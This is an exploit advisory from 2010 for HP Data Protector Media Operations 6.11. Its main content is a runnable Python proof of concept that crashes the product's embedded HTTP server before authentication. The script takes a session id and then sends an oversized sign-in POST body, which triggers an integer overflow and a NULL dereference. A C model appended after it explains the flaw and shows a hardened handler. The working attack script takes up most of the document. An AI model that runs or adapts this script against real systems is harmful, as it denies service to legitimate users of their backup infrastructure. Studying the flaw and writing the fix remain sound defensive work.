HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
Source: http://elotrolad0.blogspot.com  Author: d0lc3  Published: 2010-10-25

# Exploit Title: HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
# Date: 17/09/10
# Author: d0lc3 (@rmallof http://elotrolad0.blogspot.com/)
# Software Link: http://www.hp.com
# Version: 6.11
# Tested on: Windows XP SP3 Spa
#
#Summary:
"""
HP Data Protector Media Operations ships with an embedded HTTP server that gives
users access to the product over this protocol.

A flaw was found in this implementation that causes a remote, pre-authentication
DoS: an integer overflow while handling the length of a string sent through the
POST method.

The integer overflow leaves a variable unexpectedly initialised (reset to 0), and
that variable is then dereferenced (NULL dereference), crashing the server and
denying service to legitimate users.

This is not exploitable for code execution; the impact is denial of service only.
"""
#PoC:

#!/usr/bin/env python3

import os
import socket
import sys
import time

# Global vars
NEG = b"GET / HTTP/1.1\r\n\r\n"   # first request: the server answers with a redirect carrying a fresh session id
LIM0 = "Location:"
LIM1 = "&"
LIM2 = "sess="
# Sign-in form body. A SignInName of 0x8000 bytes or more pushes the body length past
# the range the server's length handling can represent, which is what triggers the crash.
BUF = "SignInName=" + ("A" * 0x8000) + "&SignInPassword=FOO&Sign+In=Log+In"   # >= 0x8000 to int overflow


def CV():
    os.system("clear")
    print("\t-HP Data Protector Media Operations 6.11-")
    print("\t    -HTTP Remote Denial of Service-")
    print("\n[+] Researcher:\tRoi Mallo (@rmallof)")
    print("[+] Blog:\thttp://elotrolad0.blogspot.com/")
    print("[+] Twitter:\thttps://www.twitter.com/rmallof")
    print("\n\n")


def nego(h):
    """Open a connection, send a plain GET and return the reply (a redirect with a new session id)."""
    try:
        s = socket.create_connection(h, timeout=10)
    except OSError:
        print("[x] Error connecting to remote host!")
        sys.exit(0)
    with s:
        s.sendall(NEG)
        time.sleep(1)
        rec = s.recv(1024)
    return rec.decode("latin-1")


def buildPOST(s, h, p, b):
    """Build the sign-in POST that crashes the server: s = session id, h = host, p = redirect path, b = body."""
    P = "POST /4daction/wHandleURLs/handleSignIn?sess=" + s + "&siteCode=0&lang=en& HTTP/1.1\r\n"
    P += "Host: " + h + "\r\n"
    P += "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\r\n"
    P += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    P += "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
    P += "Accept-Encoding: gzip,deflate\r\n"
    P += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
    P += "Keep-Alive: 115\r\n"
    P += "Connection: keep-alive\r\n"
    P += "Referer: http://" + h + p + "\r\n"
    P += "Content-Type: application/x-www-form-urlencoded\r\n"
    P += "Content-Length: %d\r\n" % len(b)    # the true length is sent; the server mishandles it
    P += "\r\n"
    P += b
    return P.encode("latin-1")


def main():
    CV()
    if len(sys.argv) != 2:
        print("\n[x] Usage: " + sys.argv[0] + " <host>\n\n")
        sys.exit(0)
    host = sys.argv[1]
    hostd = (host, 80)
    # 1: get a session id from the redirect the server sends for GET /
    print("[-] Getting HTTP session...")
    r = nego(hostd)
    try:
        path = r[r.index(LIM0) + len(LIM0) + 1:r.rindex(LIM1) + 1]                   # redirect PATH, trailing "&" included
        sess = path[path.index(LIM2) + len(LIM2):path.index(LIM1) + len(LIM1) - 1]   # SESSION hash between "sess=" and "&"
    except ValueError:
        print("[x] No Location header with a sess= parameter in the reply")
        sys.exit(0)
    time.sleep(1)
    print("[+] 0k, session = " + sess)
    time.sleep(1)
    # 2: send the oversized sign-in POST with the new session
    print("[-] Building POST [Content-Length: %d bytes]..." % len(BUF))
    POST = buildPOST(sess, host, path, BUF)
    with socket.create_connection(hostd, timeout=10) as s:
        print("[+] Done, Sayonara ;)")
        s.sendall(POST)    # crash it 4fun&profit :)
        time.sleep(1)


if __name__ == "__main__":
    main()
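The summary describes the crash only in outline: the POST body length overflows, a variable ends up at 0, and that variable is dereferenced. The following C model, added here as an illustration and not taken from the vendor's server or the advisory, makes that chain concrete beside a hardened version of the same handler. It assumes the length is narrowed to a signed 16-bit field (an inference from the PoC's 0x8000 threshold, not a documented fact about the product); the function names `handle_post_vuln`, `handle_post_fixed` and `make_login_body` are hypothetical, and the body it builds is the PoC's constructed sign-in form.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Assumed: the server holds the POST body length in a signed 16-bit field.
 * This models the advisory's ">= 0x8000 to int overflow" remark; it is not
 * the vendor's code. */
#define BODY_LIMIT INT16_MAX

/* Vulnerable handler, modelled on the advisory. Narrowing the length to
 * int16_t turns 0x8000 and above negative (implementation-defined in C, but a
 * two's-complement wrap on every mainstream compiler), so the allocation is
 * skipped and the body pointer keeps its initial value of NULL.
 * Returns 0 on success, -1 where the real server would dereference NULL. */
int handle_post_vuln(const char *body, size_t content_length)
{
    int16_t len = (int16_t)content_length;   /* e.g. 0x802D -> -32723 */
    char *buf = NULL;                         /* the "reset to 0" variable */
    if (len > 0)
        buf = malloc((size_t)len);
    if (buf == NULL)
        return -1;        /* real server: memcpy(buf, body, len) -> crash */
    memcpy(buf, body, (size_t)len);
    free(buf);
    return 0;
}

/* Hardened handler: check the length against the field's range before any
 * narrowing, reject oversize bodies and never use an unchecked pointer.
 * Returns 0 on success, -2 for a rejected request, -1 on allocation failure. */
int handle_post_fixed(const char *body, size_t content_length)
{
    if (content_length == 0 || content_length > (size_t)BODY_LIMIT)
        return -2;        /* answer with an error instead of allocating */
    char *buf = malloc(content_length);
    if (buf == NULL)
        return -1;
    memcpy(buf, body, content_length);
    free(buf);
    return 0;
}

/* Build the PoC's sign-in body with n_as 'A's in SignInName (constructed
 * input, same layout as the Python PoC). Caller frees. */
char *make_login_body(size_t n_as)
{
    const char *prefix = "SignInName=";
    const char *suffix = "&SignInPassword=FOO&Sign+In=Log+In";
    size_t total = strlen(prefix) + n_as + strlen(suffix);
    char *body = malloc(total + 1);
    if (body == NULL)
        return NULL;
    memcpy(body, prefix, strlen(prefix));
    memset(body + strlen(prefix), 'A', n_as);
    memcpy(body + strlen(prefix) + n_as, suffix, strlen(suffix) + 1);
    return body;
}

/* Length of the body the PoC would send for a given SignInName size. */
size_t login_body_len(size_t n_as)
{
    char *body = make_login_body(n_as);
    if (body == NULL)
        return 0;
    size_t n = strlen(body);
    free(body);
    return n;
}

/* Run one handler on a body with n_as 'A's and return the handler's result. */
int run_handler(int (*handler)(const char *, size_t), size_t n_as)
{
    char *body = make_login_body(n_as);
    if (body == NULL)
        return -1;
    int rc = handler(body, strlen(body));
    free(body);
    return rc;
}

int main(void)
{
    size_t sizes[] = { 0x100, 0x7FC0, 0x8000 };   /* the last is the PoC's value */
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++)
        printf("SignInName=%zu A's, Content-Length %zu: vuln=%d fixed=%d\n",
               sizes[i], login_body_len(sizes[i]),
               run_handler(handle_post_vuln, sizes[i]),
               run_handler(handle_post_fixed, sizes[i]));
    return 0;
}
```

With 0x7FC0 'A's the body is still 32749 bytes, inside the 16-bit range, and both handlers succeed; with the PoC's 0x8000 'A's the body is 32813 bytes, the vulnerable handler is left holding NULL, and the hardened one refuses the request before allocating. The fix is the order of operations: range-check the wide value first, narrow second.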


 